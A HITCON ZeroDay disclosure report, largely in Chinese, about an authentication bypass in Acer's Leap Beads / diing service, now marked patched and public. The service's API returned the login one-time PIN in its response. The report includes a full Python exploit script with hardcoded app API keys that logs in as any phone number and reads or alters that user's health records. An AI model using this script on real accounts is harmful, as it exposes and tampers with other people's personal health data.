Acer Leap Beads / diing server side authentication bypass - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2025-00445
  •  發信 Vendor: 宏碁股份有限公司
  • Title: Acer Leap Beads / diing server side authentication bypass
  • Introduction: 驗證時mfa的otp直接寫在response內

處理狀態

目前狀態

公開
Last Update : 2025/08/20
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2025/05/16 10:38:38 : 新提交 (由 asef18766 更新此狀態)
  • 2025/05/22 12:28:55 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/06/11 17:56:15 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/06/11 17:56:15 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/06/11 17:56:15 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/07/07 16:48:54 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/07/08 02:06:23 : 確認已修補 (由 asef18766 更新此狀態)
  • 2025/07/11 03:00:39 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2025/08/20 17:20:13 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2025-00445
  • 通報者:asef18766 (asef18766)
  • 風險:中
  • 類型:存取控制缺陷 (Broken Access Control)

參考資料

攻擊者可經由該漏洞取得、修改、刪除系統中的其他使用者的資料,或連線至高權限使用者的頁面。

OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control

CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://kamartaj-backend.diing.com/v1/resend_pin

敘述

type

Auth bypass

Impact

Access arbitary user data, 任意累積功德(?)

full exploit script

import requests
from typing import Tuple
from datetime import datetime

def init_account(phone:str)->str:
    with requests.post("https://kamartaj-backend.diing.com/v1/users", params={
        "secret_access_key": "w9rSAxcwBfZaPHyZUgkL",
        "access_key_id": "Z6jED698Vo4ovsZo",
        "phone": phone,
        "platform": "android",
        "source_from": "phone",
        "email":"",
        "deviceid": "3722b7b1-6a79-484e-8beb-ed3004b96541",
        "locale": "en",
    }) as resp:
        print(resp.status_code)
        return resp.json()["pin"]

def get_pin(phone:str)->str:
    with requests.post("https://kamartaj-backend.diing.com/v1/resend_pin", params={
        "secret_access_key": "w9rSAxcwBfZaPHyZUgkL",
        "access_key_id": "Z6jED698Vo4ovsZo",
        "phone":phone,
        "email":"",
        "type":"phone"
    }) as resp:
        print(resp.json())
        return resp.json()["pin"]

def login(phone:str, pin:str)->str:
    with requests.post("https://kamartaj-backend.diing.com/v1/login", params={
        "secret_access_key": "w9rSAxcwBfZaPHyZUgkL",
        "access_key_id": "Z6jED698Vo4ovsZo",
        "phone": phone,
        "pin": pin,
        "platform": "android",
        "type": phone,
        "email": "",
        "deviceid": "3722b7b1-6a79-484e-8beb-ed3004b96541"
    }) as resp:
        return resp.json()["auth_token"]

def get_basic_info(token:str)->dict:
    with requests.get(f"https://kamartaj-backend.diing.com/v1/users/me?auth_token={token}") as resp:
        return resp.json()

def update_user(token:str, username:str, birthday=datetime.now(), gender="apache", height=187.0, weight=87.0, bio="")->dict:
    with requests.post("https://kamartaj-backend.diing.com/v1/users/me",
        data={
            "auth_token":token,
            "name":username,
            "gender":gender,
            "birthday":birthday.strftime("%Y/%m/&d"),
            "height":str(height),
            "weight":str(weight),
            "bio":bio,
            "locale":"en",
        },
        files={
            "avatar":("cachecrop.png", open("test.png", "rb"), "image/png"),
        }
    ) as resp:
        print(resp.status_code)
        return resp.json()

def get_health_record(
    auth_token:str, 
):
    with requests.get("https://kamartaj-backend.diing.com/v1/health_records", params={
        "auth_token":auth_token,
        "per_page":999,
        "page":1,
        "order":"desc"
    }) as resp:
        return resp.json()

def update_health_record(
    auth_token:str, 
    date:datetime, 
    step_counts=1, 
    distance_meters=1, 
    calory_kcal=1, 
    activity_minutes=1, 
    light_sleep_minutes=1,
    deep_sleep_minutes=1,
    wake_minutes=1,
    total_sleep_minutes=1,
    bead_counts=87
):
    with requests.post(f"https://kamartaj-backend.diing.com/v1/health_records/{date.strftime('%Y-%m-&d')}", data={
        "auth_token":auth_token,
        "step_counts":step_counts,
        "distance_meters":distance_meters,
        "calory_kcal":calory_kcal,
        "activity_minutes":activity_minutes,
        "light_sleep_minutes":light_sleep_minutes,
        "deep_sleep_minutes":deep_sleep_minutes,
        "wake_minutes":wake_minutes,
        "total_sleep_minutes":total_sleep_minutes,
        "bead_counts":bead_counts
    }) as resp:
        print(resp.status_code)
        return resp.json()

if __name__ == "__main__":
    from pprint import pprint
    phone = "886277496696"
    #pin = (init_account(phone))

    pin = get_pin(phone)
    print(pin)
    token = login(phone, pin)

    #print(get_basic_info(token))
    #pprint(get_health_record(token))
    #print(update_health_record(token, datetime.now()))
    #print(update_user(token, "6666"))

修補建議

將在response內的pin碼移除

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;